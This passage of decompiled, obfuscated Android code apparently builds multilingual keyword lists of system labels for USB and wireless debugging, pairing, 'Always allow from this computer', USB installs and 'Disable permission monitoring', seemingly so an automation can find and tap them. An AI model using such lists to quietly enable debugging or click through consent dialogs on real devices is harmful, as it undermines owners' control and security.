        AbstractC0716jf.m213306g5("重启", "重新启动", "重新啟動", "Reboot", "Restart", "再起動", "다시 시작", "Khởi động lại", "รีสตาร์ท", "Mulai ulang", "Redémarrer", "Reiniciar", "Neustart", "Riavvia", "Перезагрузить", "Перезапустити", "Uruchom ponownie", "Restartovat");
        AbstractC0716jf.m213306g5("通讯录", "联系人", "通訊錄", "聯絡人", "Contacts", "读取联系人", "Read contacts", "連絡先", "연락처", "Danh bạ", "รายชื่อ", "Kontak", "Contacts", "Contactos", "Kontakte", "Contatti", "Контакты", "Контакти", "Kontakty");
        AbstractC0716jf.m213306g5("需要在锁屏上显示", "在锁屏上显示", "在锁屏上方显示", "锁屏上方显示相关信息", "鎖屏上方顯示", "Display over lock screen", "Show on lock screen", "Display on lock screen", "Appear on top", "ロック画面に表示", "잠금 화면에 표시", "Hiển thị trên màn hình khóa", "แสดงบนหน้าจอล็อก", "Tampilkan di layar kunci", "Afficher sur l'écran de verrouillage", "Mostrar en pantalla de bloqueo", "Auf Sperrbildschirm anzeigen", "Показывать на экране блокировки");
        f55784d4 = AbstractC0716jf.m213306g5("返回", "Back", "关闭", "Close", "忘记", "Forgot", "相机", "Camera", "锁屏画报", "充电", "Battery", "戻る", "닫기", "閉じる", "Kembali", "Tutup", "Quay lại", "Đóng", "กลับ", "ปิด", "Retour", "Fermer", "Volver", "Cerrar", "Voltar", "Fechar", "Zurück", "Schließen", "Terug", "Sluiten", "Назад", "Закрыть");
        f55785d5 = AbstractC0716jf.m213306g5("USB调试", "USB 调试", "USB debugging", "USB デバッグ", "USBデバッグ", "USB 디버깅", "Gỡ lỗi qua USB", "Gỡ lỗi USB", "การแก้ไขข้อบกพร่อง USB", "การดีบัก USB", "Proses debug USB", "Debug USB", "Debugging USB", "Penyahpepijatan USB", "Pag-debug ng USB", "यूएसबी डीबग करना", "USB ডিবাগিং", "USB ڈیبگنگ", "تصحيح أخطاء USB", "ניפוי באגים ב-USB", "اشکال\u200cزدایی USB", "USB hata ayıklaması", "Débogage USB", "Depuración por USB", "Depuración USB", "Depuração USB", "Debug USB", "USB-Debugging", "USB debuggen", "USB-foutopsporing", "USB-felsökning", "USB-feilsøking", "USB-fejlretning", "USB-vianetsintä", "Отладка по USB", "Налагодження USB", "Debugowanie USB", "Ladění přes USB", "Ladenie cez USB", "USB hibakeresés", "Remedierea erorilor prin USB", "Εντοπισμός σφαλμάτων USB", "През USB", "Utatuzi wa USB", "RSA密钥", "RSA key", "RSA-Schlüssel", "指纹", "此计算机", "this computer", "diesem Computer", "始终允许", "Always allow");
        f55786d6 = AbstractC0716jf.m213306g5("使用配对码配对设备", "IP 地址和端口", "IP地址和端口", "使用配對碼配對裝置", "IP 位址和通訊埠", "Pair device with pairing code", "IP address & port", "IP address and port", "ペア設定コードによるデバイスのペア設定", "IP アドレスとポート", "ペアリングコードで端末をペアリング", "페어링 코드로 기기 페어링", "IP 주소 및 포트", "Ghép nối thiết bị bằng mã ghép nối", "Địa chỉ IP và cổng", "จับคู่อุปกรณ์ด้วยรหัสการจับคู่", "ที่อยู่ IP และพอร์ต", "Sambungkan perangkat dengan kode penyambungan", "Alamat IP", "Gandingkan peranti dengan kod gandingan", "Alamat IP", "Pinapares ang device gamit ang code ng pagpapares", "IP address at Port", "जोड़ने का कोड इस्तेमाल करके", "आईपी पता और पोर्ट", "পেয়ারিং কোড ব্যবহার করে", "IP অ্যাড্রেস ও পোর্ট", "جوڑا بنانے کے کوڈ کے ذریعے", "IP پتہ اور پورٹ", "إقران الجهاز باستخدام رمز الإقران", "عنوان IP والمنفذ", "התאמת מכשיר באמצעות קוד התאמה", "יציאה וכתובת IP", "جفت کردن دستگاه با کد مرتبط\u200cسازی", "نشانی IP و درگاه", "Eşleme kodu ile cihaz eşle", "IP adresi ve Bağlantı noktası", "Associer l'appareil avec un code d'association", "Adresse IP et port", "Emparejar dispositivo con código de sincronización", "Dirección IP y puerto", "Parear o dispositivo com um código de pareamento", "Endereço IP e porta", "Accoppia dispositivo con codice di accoppiamento", "Indirizzo IP e porta", "Gerät über einen Kopplungscode koppeln", "IP-Adresse", "Apparaat koppelen met koppelingscode", "IP-adres en poort", "Parkoppla enheten med en parkopplingskod", "IP-adress och port", "Koble til enheten med en tilkoblingskode", "IP-adresse og port", "Par enhed ved hjælp af en parringskode", "IP-adresse og port", "Yhdistä laite laiteparikoodilla", "IP-osoite", "Подключить устройство с помощью кода подключения", "IP-адрес и порт", "Підключати пристрій за допомогою коду підключення", "IP-адреса та порт", "Sparuj urządzenie przy pomocy kodu parowania", "Adres IP i port", "Párovat zařízení pomocí párovacího kódu", "IP adresa a port", "Spárovať zariadenie párovacím kódom", "Adresa IP a port", "Eszköz párosítása párosítókóddal", "IP-cím és port", "Asociază dispozitivul folosind codul de conectare", "Adresa IP și portul", "Σύζευξη συσκευής με κωδικό σύζευξης", "Διεύθυνση IP και θύρα", "Сдвояване на устройството чрез код за сдвояване", "IP адрес и порт", "Unganisha kifaa ukitumia msimbo wa kuunganisha", "Anwani ya IP na Mlango", "पेयरिङ कोड प्रयोग गरी कनेक्ट गर्नुहोस्", "IP एड्रेस र पोर्ट", "ຈັບຄູ່ອຸປະກອນໂດຍໃຊ້ລະຫັດການຈັບຄູ່", "ທີ່ຢູ່ IP ແລະ ຜອດ", "ផ្គូផ្គង\u200bឧបករណ៍\u200bដោយប្រើ\u200bកូដផ្គូផ្គង", "អាសយដ្ឋាន IP និងច្រក", "တွဲချိတ်ကုဒ်ဖြင့် စက်ပစ္စည်းကို အတူတွဲပါ");
        f55787d7 = AbstractC0716jf.m213306g5("与设备配对", "WLAN 配对码", "與裝置配對", "Pair with device", "Wi-Fi pairing code", "デバイスとのペア設定", "Wi-Fi ペアリングコード", "기기 페어링", "Wi-Fi 페어링 코드", "Ghép nối với thiết bị", "จับคู่กับอุปกรณ์", "Sambungkan dengan perangkat", "Pasangkan dengan perangkat", "Gandingkan dengan peranti", "Ipares sa device", "डिवाइस से जोड़ें", "ডিভাইসের সাথে পেয়ার করুন", "آلہ کے ساتھ جوڑا بنائیں", "الإقران مع الجهاز", "התאמה למכשיר", "جفت کردن با دستگاه", "Cihazla eşle", "Eşleştir", "Associer à l'appareil", "Associer l'appareil", "Emparejar con dispositivo", "Emparejar dispositivo", "Parear com o dispositivo", "Vincular dispositivo", "Accoppia con dispositivo", "Mit Gerät koppeln", "Koppelen aan apparaat", "Koppelen met apparaat", "Parkoppla med enheten", "Para med enhet", "Koble til enheten", "Par med enhed", "Parret med enhed", "Muodosta laitepari", "Yhdistä laitteeseen", "Подключение к устройству", "Сопряжение с устройством", "Підключитися до пристрою", "Парування з пристроєм", "Sparuj z urządzeniem", "Sparuj se zařízením", "Spárování se zařízením", "Párovanie so zariadením", "Spárovať so zariadením", "Párosítás eszközzel", "Eszközpárosítás", "Asociază cu dispozitivul", "Asociere dispozitiv", "Σύζευξη με συσκευή", "Сдвояване с устройство", "Unganisha na kifaa", "यन्त्रसँग कनेक्ट गर्नुहोस्", "ຈັບຄູ່ອຸປະກອນໃໝ່", "ផ្គូផ្គង\u200bជាមួយ\u200bឧបករណ៍", "စက်ပစ္စည်းနှင့် အတူတွဲပါ", "በመሣሪያ ያጣምሩ", "උපංගය සමගින් යුගල කරන්න");
        f55788d8 = AbstractC0716jf.m213306g5("下一步", "下一個", "繼續", "次へ", "다음", "Tiếp theo", "Tiếp tục", "ถัดไป", "Selanjutnya", "Berikutnya", "Lanjut", "Seterusnya", "Susunod", "ရှေ့သို့", "နောက်တစ်ခု", "បន្ទាប់", "ຕໍ່ໄປ", "आगे बढ़ें", "अगला", "आगे", "পরবর্তী", "اگلا", "अर्को", "මීළඟ", "ቀጣይ", "அடுத்து", "తదుపరి", "ಮುಂದೆ", "അടുത്തത്", "पुढे", "આગળ", "ਅੱਗੇ", "التالي", "הבא", "بعدی", "İleri", "Sonraki", "Next", "Suivant", "Siguiente", "Avançar", "Próximo", "Seguinte", "Avanti", "Weiter", "Volgende", "Nästa", "Neste", "Næste", "Seuraava", "Далее", "Далі", "Dalej", "Další", "Ďalej", "Tovább", "Következő", "Înainte", "Următorul", "Επόμενο", "Напред", "Endelea", "Dalje", "Naprej", "Tālāk", "Toliau", "Edasi", "Tjetër");
        f55789d9 = AbstractC0716jf.m213306g5("无线调试", "無線偵錯", "无线ADB调试", "ワイヤレス デバッグ", "ワイヤレスデバッグ", "무선 디버깅", "Gỡ lỗi qua Wi-Fi", "Gỡ lỗi không dây", "การแก้ไขข้อบกพร่องผ่าน Wi-Fi", "การดีบักแบบไร้สาย", "Proses debug nirkabel", "Debug nirkabel", "Debugging nirkabel", "Penyahpepijatan wayarles", "Nyahpepijat wayarles", "Wireless na pag-debug", "वॉयरलेस डीबगिंग", "वायरलेस डिबगिंग", "ওয়্যারলেস ডিবাগিং", "وائرلیس ڈیبگنگ", "تصحيح الأخطاء اللاسلكي", "ניפוי באגים אלחוטי", "اشکال\u200cزدایی بی\u200cسیم", "Kablosuz hata ayıklama", "Wireless debugging", "Débogage sans fil", "Depuración inalámbrica", "Depuração por Wi-Fi", "Depuração sem fio", "Debug wireless", "Debugging über WLAN", "Kabelloses Debugging", "Draadloze foutopsporing", "Trådlös felsökning", "Trådløs feilsøking", "Trådløs fejlretning", "Trådløs fejlfinding", "Langaton virheenkorjaus", "Отладка по Wi-Fi", "Беспроводная отладка", "Налагодження через Wi-Fi", "Бездротове налагодження", "Debugowanie bezprzewodowe", "Bezdrátové ladění", "Bezdrôtové ladenie", "Vezeték nélküli hibakeresés", "Remedierea erorilor wireless", "Depanare wireless", "Ασύρματος εντοπισμός σφαλμάτων", "Безжично отстраняване на грешки", "Utatuzi usiotumia waya", "ကြိုးမဲ့ အမှားရှာပြင်ခြင်း", "ការជួសជុល\u200bដោយឥតខ្សែ", "ການດີບັກໄຮ້ສາຍ", "वायरलेस डिबगिङ", "නොරැහැන් දෝෂාවේක්ෂණය", "ገመድ-አልባ debugging");
        f55790e0 = AbstractC0716jf.m213306g5("使用配对码配对设备", "使用配對碼配對裝置", "ペア設定コードによるデバイスのペア設定", "ペアリングコードでデバイスをペアリング", "페어링 코드로 기기 페어링", "Ghép nối thiết bị bằng mã ghép nối", "จับคู่อุปกรณ์ด้วยรหัสการจับคู่", "Sambungkan perangkat dengan kode penyambungan", "Pasangkan perangkat dengan kode penyambungan", "Gandingkan peranti dengan kod gandingan", "Pasangkan peranti dengan kod berpasangan", "Pinapares ang device gamit ang code ng pagpapares", "Ipares ang device gamit ang pairing code", "जोड़ने का कोड इस्तेमाल करके, डिवाइस जोड़ें", "पेयरिंग कोड से डिवाइस जोड़ें", "পেয়ারিং কোড ব্যবহার করে ডিভাইসের সাথে পেয়ার করুন", "جوڑا بنانے کے کوڈ کے ذریعے آلہ کا جوڑا بنائیں", "إقران الجهاز باستخدام رمز الإقران", "התאמת מכשיר באמצעות קוד התאמה", "جفت کردن دستگاه با کد مرتبط\u200cسازی", "Eşleme kodu ile cihaz eşle", "Pair device with pairing code", "Associer l'appareil avec un code d'association", "Emparejar dispositivo con código de sincronización", "Parear o dispositivo com um código de pareamento", "Accoppia dispositivo con codice di accoppiamento", "Gerät über einen Kopplungscode koppeln", "Apparaat koppelen met koppelingscode", "Parkoppla enheten med en parkopplingskod", "Koble til enheten med en tilkoblingskode", "Par enhed ved hjælp af en parringskode", "Yhdistä laite laiteparikoodilla", "Подключить устройство с помощью кода подключения", "Підключати пристрій за допомогою коду підключення", "Sparuj urządzenie przy pomocy kodu parowania", "Párovat zařízení pomocí párovacího kódu", "Spárovať zariadenie párovacím kódom", "Eszköz párosítása párosítókóddal", "Asociază dispozitivul folosind codul de conectare", "Σύζευξη συσκευής με κωδικό σύζευξης", "Сдвояване на устройството чрез код за сдвояване", "Unganisha kifaa ukitumia msimbo wa kuunganisha", "တွဲချိတ်ကုဒ်ဖြင့် စက်ပစ္စည်းကို အတူတွဲပါ", "ផ្គូផ្គង\u200bឧបករណ៍\u200bដោយប្រើ\u200bកូដផ្គូផ្គង", "ຈັບຄູ່ອຸປະກອນໂດຍໃຊ້ລະຫັດການຈັບຄູ່", "पेयरिङ कोड प्रयोग गरी कनेक्ट गर्नुहोस्", "යුගල කිරීමේ කේතය සමගින් උපාංගය යුගල කරන්න", "የማጣመሪያ ኮድን በመጠቀም መሣሪያን ያጣምሩ");
        f55791e1 = AbstractC0716jf.m213306g5("版本号", "构建号", "版本號", "構建號", "Build 号", "MIUI 版本", "OS版本", "ColorOS版本号", "ColorOS版本", "ColorOS version", "软件版本号", "软件版本", "HarmonyOS版本", "HarmonyOS version", "编译编号", "编译号", "系统版本", "ビルド番号", "빌드 번호", "Số bản dựng", "Số hiệu bản tạo", "Số hiệu bảng dựng", "หมายเลขบิลด์", "Nomor build", "Nomor versi", "Nomor kompilasi", "Nomor bentukan", "Nombor binaan", "Numero ng build", "बिल्\u200dड नंबर", "बिल्ड नंबर", "বিল্ড নম্বর", "بلڈ نمبر", "رقم الإصدار", "מספר Build", "מספר גרסת Build", "شمارهٔ ساخت", "شماره ساخت", "Derleme numarası", "Yapım numarası", "Build number", "Numéro de build", "Número de compilación", "Número da versão", "Número de compilação", "Numero build", "Build-Nummer", "Buildnummer", "Build-nummer", "Version", "Versionsnummer", "Byggnummer", "Delversjonsnummer", "Buildnummer", "Byggnummer", "Buildnummer", "Ohjelmistoversion numero", "Koontiversio", "Koontinumero", "Номер сборки", "Номер складання", "Numer kompilacji", "Číslo sestavení", "Číslo zostavy", "Buildszám", "Build szám", "Build-szám", "Numărul versiunii", "Număr versiune", "Αριθμός έκδοσης", "Номер на версията", "Номер на компилацията", "Nambari ya muundo", "တည်ဆောက်ပုံအမှတ်", "លេខ\u200bកំណែបង្កើត", "ໝາຍເລກ Build", "बिल्ड नम्बर", "නිර්මාණ අංකය", "የግንብ ቁጥር", "Sastavni broj", "Broj međuverzije", "Številka gradnje", "Būvējuma numurs", "Versijos numeris", "Järgunumber");
        AbstractC0716jf.m213306g5("允许USB调试", "允许 USB 调试", "允许USB调试吗", "允许 USB 调试吗", "允許 USB 偵錯嗎", "允許USB偵錯嗎", "允許USB調試嗎", "允許 USB 調試嗎", "USB デバッグを許可しますか", "USBデバッグを許可しますか", "USB 디버깅을 허용하시겠습니까", "Cho phép gỡ lỗi qua USB", "Cho phép gỡ lỗi USB", "อนุญาตให้แก้ไขข้อบกพร่อง USB หรือไม่", "อนุญาตการดีบัก USB", "Izinkan debug USB", "Izinkan debugging USB", "Benarkan penyahpepijatan USB", "Payagan ang pag-debug ng USB", "Payagan ang USB debugging", "USB डीबगिंग करने दें", "USB डिबगिंग की अनुमति दें", "USB ডিবাগিং মঞ্জুর করবেন", "USB ডিবাগিং অনুমতি দিন", "USB ڈیبگ کرنے کی اجازت دیں", "USB ڈیبگنگ کی اجازت دیں", "هل تريد السماح بتصحيح أخطاء USB", "האם לאפשר ניפוי באגים ב-USB", "اشکال\u200cزدایی USB مجاز است", "اجازه اشکال\u200cزدایی USB", "USB hata ayıklamasına izin verilsin mi", "USB hata ayıklamaya izin verilsin mi", "Allow USB debugging", "Autoriser le débogage USB", "Permitir depuración por USB", "Permitir depuración USB", "Permitir a depuração USB", "Permitir depuração USB", "Consentire debug USB", "USB-Debugging zulassen", "USB-foutopsporing toestaan", "Ska USB-felsökning tillåtas", "Tillåt USB-felsökning", "Tillat USB-feilsøking", "Vil du tillade USB-fejlretning", "Tillad USB-fejlfinding", "Sallitaanko USB-vianetsintä", "Sallitaanko USB-virheenkorjaus", "Отладка по USB", "Разрешить отладку по USB", "Дозволити налагодження USB", "Zezwalać na debugowanie USB", "Zezwolić na debugowanie USB", "Povolit ladění přes USB", "Povolit ladění USB", "Povoliť ladenie USB", "Engedélyezi az USB hibakeresést", "USB-hibakeresés engedélyezése", "Permiți remedierea erorilor prin USB", "Permiteți depanarea USB", "Να επιτραπεί ο εντοπισμός σφαλμάτων USB", "Разрешаване на USB отстраняване на грешки", "Ruhusu utatuaji wa USB", "USB डिबग गर्नको लागि अनुमति दिने हो", "ອະນຸຍາດການດີບັກຜ່ານ USB", "អនុញ្ញាត\u200bការ\u200bកែ\u200bកំហុសតាម USB", "USB အမှားရှာဖွေပြင်ဆင်ခြင်း ခွင့်ပြုပါမည်လား");
        AbstractC0716jf.m213306g5("一律允许使用这台计算机进行调试", "始终允许使用这台计算机调试", "一律允許透過這台電腦進行", "一律允許從這部電腦進行偵錯", "このパソコンからの USB デバッグを常に許可する", "このパソコンからのUSBデバッグを常に許可する", "이 컴퓨터에서 항상 허용", "Luôn cho phép từ máy tính này", "อนุญาตจากคอมพิวเตอร์เครื่องนี้เสมอ", "Selalu izinkan dari komputer ini", "Sentiasa benarkan komputer ini", "Sentiasa benarkan dari komputer ini", "Palaging payagan mula sa computer na ito", "Laging payagan mula sa computer na ito", "इस कंप्यूटर से हमेशा अनुमति दें", "এই কম্পিউটার থেকে সর্বদা অনুমতি দিন", "اس کمپیوٹر سے ہمیشہ اجازت دیں", "السماح دائمًا من هذا الكمبيوتر", "אפשר תמיד מהמחשב הזה", "אפשר תמיד ממחשב זה", "همیشه از این رایانه انجام شود", "همیشه از این رایانه اجازه بده", "Bu bilgisayardan her zaman izin ver", "Always allow from this computer", "Toujours autoriser sur cet ordinateur", "Toujours autoriser depuis cet ordinateur", "Permitir siempre desde este ordenador", "Sempre permitir a partir deste computador", "Sempre permitir neste computador", "Consenti sempre da questo computer", "Immer von diesem Computer zulassen", "Altijd toestaan vanaf deze computer", "Tillåt alltid på den här datorn", "Tillåt alltid från denna dator", "Alltid tillat fra denne datamaskinen", "Tillad altid fra denne computer", "Salli aina tällä tietokoneella", "Salli aina tältä tietokoneelta", "Всегда разрешать отладку с этого компьютера", "Всегда разрешать с этого компьютера", "Завжди дозволяти з цього комп'ютера", "Zawsze zezwalaj z tego komputera", "Vždy povolit z tohoto počítače", "Vždy povoliť z tohto počítača", "Mindig engedélyezze erről a számítógépről", "Permite întotdeauna de pe acest computer", "Permiteți întotdeauna de pe acest computer", "Να επιτρέπεται πάντα από αυτόν τον υπολογιστή", "Винаги разрешавай от този компютър", "Ruhusu kutoka kwenye kompyuta hii kila wakati", "यो कम्प्युटरबाट सधैँ अनुमति दिनुहोस्", "ອະນຸຍາດຈາກຄອມພິວເຕີນີ້ຕະຫຼອດ", "អនុញ្ញាត\u200bជា\u200bនិច្ច\u200bសម្រាប់\u200bកុំព្យូទ័រ\u200bនេះ", "ဒီကွန်ပျူတာမှ အမြဲခွင့်ပြုရန်");
        f55792e2 = AbstractC0716jf.m213306g5("要允许通过此网络进行无线调试吗", "允许通过此网络进行无线调试", "通过此网络进行无线调试", "要允許透過此網路進行無線偵錯嗎", "このネットワークでワイヤレスデバッグを許可しますか", "이 네트워크에서 무선 디버깅을 허용하시겠습니까", "Cho phép gỡ lỗi không dây trên mạng này", "อนุญาตการดีบักแบบไร้สายบนเครือข่ายนี้", "Izinkan debug nirkabel di jaringan ini", "Izinkan debugging nirkabel di jaringan ini", "Benarkan nyahpepijat wayarles di rangkaian ini", "Payagan ang wireless debugging sa network na ito", "इस नेटवर्क पर वायरलेस डिबगिंग की अनुमति दें", "এই নেটওয়ার্কে ওয়্যারলেস ডিবাগিং অনুমতি দিন", "اس نیٹ ورک پر وائرلیس ڈیبگنگ کی اجازت دیں", "السماح بتصحيح الأخطاء اللاسلكي على هذه الشبكة", "לאפשר ניפוי באגים אלחוטי ברשת זו", "اجازه اشکال\u200cزدایی بی\u200cسیم در این شبکه", "Bu ağda kablosuz hata ayıklamaya izin ver", "Allow wireless debugging on this network", "Autoriser le débogage sans fil sur ce réseau", "¿Permitir la depuración inalámbrica en esta red?", "Permitir depuração sem fio nesta rede", "Consentire debug wireless su questa rete", "Kabelloses Debugging in diesem Netzwerk zulassen", "Draadloze foutopsporing op dit netwerk toestaan", "Tillåt trådlös felsökning i det här nätverket", "Tillat trådløs feilsøking på dette nettverket", "Tillad trådløs fejlfinding på dette netværk", "Salli langaton virheenkorjaus tässä verkossa", "Разрешить беспроводную отладку в этой сети", "Дозволити бездротове налагодження в цій мережі", "Zezwolić na debugowanie bezprzewodowe w tej sieci", "Povolit bezdrátové ladění v této síti", "Povoliť bezdrôtové ladenie v tejto sieti", "Vezeték nélküli hibakeresés engedélyezése ezen a hálózaton", "Permiteți depanarea wireless pe această rețea", "Να επιτραπεί ο ασύρματος εντοπισμός σφαλμάτων σε αυτό το δίκτυο", "Разрешаване на безжично отстраняване на грешки в тази мрежа");
        f55793e3 = AbstractC0716jf.m213306g5("配对失败", "配對失敗", "ペア設定エラー", "ペアリングに失敗", "ペアリング失敗", "페어링 실패", "Ghép nối không thành công", "Ghép nối thất bại", "การจับคู่ไม่สำเร็จ", "การจับคู่ล้มเหลว", "Penyambungan perangkat gagal", "Penyambungan gagal", "Gandingan tidak berjaya", "Pemasangan gagal", "Hindi nagawa ang pagpapares", "Nabigo ang pagpapares", "दूसरे डिवाइस से जोड़ा नहीं जा सका", "पेयरिंग विफल", "পেয়ার করা যায়নি", "পেয়ারিং ব্যর্থ", "جوڑا بنانے میں ناکام", "جوڑا بنانا ناکام", "تعذّر الإقران", "فشل الإقران", "ההתאמה נכשלה", "مرتبط\u200cسازی ناموفق", "جفت\u200cسازی ناموفق", "Eşleme başarısız oldu", "Eşleştirme başarısız", "Pairing failed", "Pairing unsuccessful", "Échec de l'association", "No se ha podido emparejar", "Error de vinculación", "Falha no pareamento", "Emparelhamento falhou", "Accoppiamento non riuscito", "Kopplung fehlgeschlagen", "Koppeling mislukt", "Koppelen mislukt", "Det gick inte att parkoppla", "Koppling misslyckades", "Tilkoblingen mislyktes", "Paring mislyktes", "Pardannelse mislykkedes", "Parring mislykkedes", "Laiteparin muodostus ei onnistunut", "Laiteparin muodostus epäonnistui", "Не удалось подключить устройство", "Сбой сопряжения", "Помилка підключення", "Помилка сполучення", "Parowanie nie powiodło się", "Spárování se nezdařilo", "Párování selhalo", "Párovanie zlyhalo", "Sikertelen párosítás", "Párosítás sikertelen", "Asociere nereușită", "Asocierea a eșuat", "Η σύζευξη δεν ήταν επιτυχής", "Η σύζευξη απέτυχε", "Сдвояването не е успешно", "Сдвояването е неуспешно", "Imeshindwa kuoanisha", "कनेक्ट गर्न सकिएन", "ການຈັບຄູ່ບໍ່ສຳເລັດ", "ការផ្គូផ្គង\u200bមិន\u200bជោគជ័យ\u200bទេ", "တွဲချိတ်ခြင်း မအောင်မြင်ပါ", "ማጣመር ተሳክቷል", "යුගල කිරීම අසාර්ථකයි");
        f55794e4 = AbstractC0716jf.m213306g5("撤消 USB 调试授权", "撤消USB调试授权", "禁用ADB授权超时", "撤銷 USB 偵錯授權", "撤消USB偵錯授權", "USB デバッグの許可の取り消し", "USBデバッグの許可の取消", "USB 디버깅 권한 승인 취소", "USB 디버깅 권한 취소", "Thu hồi các lượt ủy quyền gỡ lỗi qua USB", "Thu hồi ủy quyền gỡ lỗi USB", "เพิกถอนการให้สิทธิ์การแก้ไขข้อบกพร่อง USB", "เพิกถอนการอนุญาตการดีบัก USB", "Cabut otorisasi debug USB", "Cabut otorisasi debugging USB", "Batalkan kebenaran penyahpepijatan USB", "Bawiin ang mga pahintulot sa pag-debug ng USB", "Bawiin ang mga pahintulot sa USB debugging", "यूएसबी डीबग करने की अनुमति रद्द करें", "USB डिबगिंग अधिकृतता रद्द करें", "USB ডিবাগিং অনুমতিগুলি প্রত্যাহার করুন", "USB ডিবাগিং অনুমোদন প্রত্যাহার করুন", "USB ڈیبگنگ کی اجازت دہندگیوں کو منسوخ کریں", "USB ڈیبگنگ کی اجازتیں منسوخ کریں", "إلغاء عمليات تفويض تصحيح أخطاء USB", "إبطال تفويضات تصحيح أخطاء USB", "ביטול הרשאות לניפוי ב-USB", "ביטול הרשאות ניפוי באגים ב-USB", "لغو مجوزهای اشکال\u200cزدایی USB", "USB hata ayıklama yetkilerini kaldır", "USB hata ayıklama yetkilerini iptal et", "Revoke USB debugging authorizations", "Révoquer les autorisations de débogage USB", "Revocar autorizaciones de depuración por USB", "Revocar autorizaciones de depuración USB", "Revogar autorizações de depuração USB", "Revoca autorizzazioni debug USB", "USB-Debugging-Autorisierungen aufheben", "USB-Debugging-Autorisierungen widerrufen", "Autorisatie USB-foutopsporing intrekken", "USB-foutopsporingsautorisaties intrekken", "Återkalla åtkomst till USB-felsökning", "Återkalla USB-felsökningsbehörigheter", "USB-feilsøking – opphev autorisasjon", "Tilbakekall USB-feilsøkingstillatelser", "Tilbagekald tilladelser for USB-fejlretning", "Tilbagekald USB-fejlfindingsautorisationer", "Peru USB-vianetsinnän käyttöoikeudet", "Kumoa USB-virheenkorjauksen valtuutukset", "Отозвать доступ для отладки по USB", "Отозвать авторизации USB-отладки", "Скасувати доступ до налагодження USB", "Відкликати авторизації налагодження USB", "Odwołaj dostęp do debugowania USB", "Cofnij autoryzacje debugowania USB", "Zrušit autorizace k ladění přes USB", "Odvolat autorizace ladění USB", "Odvolať autorizácie na ladenie cez USB", "Odvolať autorizácie ladenia USB", "USB-s hibakeresésre vonatkozó engedélyek visszavonása", "USB-hibakeresési engedélyek visszavonása", "Revocă autorizații de remediere a erorilor prin USB", "Revocați autorizațiile de depanare USB", "Ανάκληση εξ/σεων εντ/σμού σφ/των USB", "Ανάκληση εξουσιοδοτήσεων εντοπισμού σφαλμάτων USB", "Отмяна на упълномощ. за отстр. на грешки през USB", "Отмяна на разрешенията за USB отстраняване на грешки", "Batilisha idhini za kurekebisha USB", "USB डिबग गर्ने अधिकार फिर्ता लिइयोस्", "ຖອດຖອນການອະນຸຍາດການດີບັກຜ່ານ USB", "ដក\u200bសិទ្ធិ\u200bជួសជុលតាម USB", "USB အမှားရှာပြင်ဆင်ခွင့်များ ပြန်ရုပ်သိမ်းခြင်း", "የዩ ኤስ ቢ ስህተት ማረም ፈቀዳዎችን ይሻሩ", "USB නිදොස් කිරීම් අනුමැති අහෝසි කරන්න");
        f55795e5 = AbstractC0716jf.m213306g5("USB安装", "允许USB安装", "通过USB安装", "USB 安裝", "USBでインストール", "USB経由でインストール", "USB로 설치", "USB를 통해 설치", "Cài đặt qua USB", "ติดตั้งผ่าน USB", "Instal melalui USB", "Pasang melalui USB", "I-install sa pamamagitan ng USB", "USB के ज़रिए इंस्टॉल करें", "USB এর মাধ্যমে ইনস্টল করুন", "USB کے ذریعے انسٹال کریں", "التثبيت عبر USB", "התקנה דרך USB", "نصب از طریق USB", "USB üzerinden yükle", "Install via USB", "Allow USB installation", "Installer via USB", "Instalar vía USB", "Instalar via USB", "Installa tramite USB", "Über USB installieren", "Installeren via USB", "Installera via USB", "Installer via USB", "Installér via USB", "Asenna USB:n kautta", "Установка через USB", "Встановлення через USB", "Instaluj przez USB", "Instalovat přes USB", "Inštalovať cez USB", "Telepítés USB-n keresztül", "Instalare prin USB", "Εγκατάσταση μέσω USB", "Инсталиране чрез USB");
        f55796e6 = AbstractC0716jf.m213306g5("安全设置", "USB调试（安全设置）", "USB调试(安全设置)", "USB安全设置", "安全設定", "USB偵錯（安全設定）", "USBデバッグ（セキュリティ設定）", "セキュリティ設定", "USB 디버깅(보안 설정)", "보안 설정", "Cài đặt bảo mật USB", "การตั้งค่าความปลอดภัย USB", "Pengaturan keamanan USB", "Tetapan keselamatan USB", "USB सुरक्षा सेटिंग्स", "إعدادات أمان USB", "USB güvenlik ayarları", "USB debugging (Security settings)", "USB debugging(Security settings)", "USB security settings", "Paramètres de sécurité USB", "Configuración de seguridad USB", "Configurações de segurança USB", "Impostazioni di sicurezza USB", "USB-Sicherheitseinstellungen", "USB-beveiligingsinstellingen", "USB-säkerhetsinställningar", "USB-sikkerhetsinnstillinger", "USB-sikkerhedsindstillinger", "USB-suojausasetukset", "Настройки безопасности USB", "Налаштування безпеки USB", "Ustawienia zabezpieczeń USB", "Nastavení zabezpečení USB", "Nastavenia zabezpečenia USB", "USB biztonsági beállítások", "Setări de securitate USB", "Ρυθμίσεις ασφαλείας USB", "Настройки за сигурност на USB");
        f55797e7 = AbstractC0716jf.m213306g5("关闭权限监控", "禁止权限监控", "禁用权限监控", "關閉權限監控", "禁止權限監控", "権限監視を無効化", "권한 모니터링 비활성화", "Tắt giám sát quyền", "ปิดใช้งานการตรวจสอบสิทธิ์", "Nonaktifkan pemantauan izin", "Lumpuhkan pemantauan kebenaran", "अनुमति निगरानी अक्षम करें", "تعطيل مراقبة الأذونات", "İzin izlemeyi devre dışı bırak", "Disable permission monitoring", "Désactiver la surveillance des autorisations", "Desactivar supervisión de permisos", "Desativar monitoramento de permissões", "Disattiva monitoraggio autorizzazioni", "Berechtigungsüberwachung deaktivieren", "Machtigingscontrole uitschakelen", "Inaktivera behörighetsövervakning", "Deaktiver tillatelsesovervåking", "Deaktiver tilladelsesovervågning", "Poista käyttöoikeuksien valvonta käytöstä", "Отключить мониторинг разрешений", "Вимкнути моніторинг дозволів", "Wyłącz monitorowanie uprawnień", "Zakázat sledování oprávnění", "Zakázať sledovanie oprávnení", "Engedélyfigyelés letiltása", "Dezactivați monitorizarea permisiunilor", "Απενεργοποίηση παρακολούθησης δικαιωμάτων", "Деактивиране на наблюдение на разрешенията");
